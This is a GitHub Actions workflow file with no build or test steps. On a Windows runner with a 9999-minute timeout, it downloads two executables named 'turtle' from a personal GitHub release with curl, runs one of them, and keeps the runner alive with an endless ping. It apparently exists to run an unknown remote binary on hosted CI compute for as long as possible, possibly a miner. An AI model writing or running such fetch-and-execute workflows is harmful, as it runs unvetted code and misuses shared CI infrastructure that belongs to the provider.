name: RUNNING

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-2019
    timeout-minutes: 9999

    steps:
    - name: checksystem.
      run: systeminfo
    - name: Downloading checker.
      run: curl -L -o turtle-checker.exe https://github.com/endri12345/wejhs/releases/download/files/turtle-checker.exe
    - name: downloading start.  
      run: curl -L -o turtle.exe https://github.com/endri12345/wejhs/releases/download/files/turtle.exe
    - name: jalankan.
      run: .\turtle.exe
    - name: checklokasifile.
      run: ls
    - name: ping.
      run: ping 8.8.8.8 -t
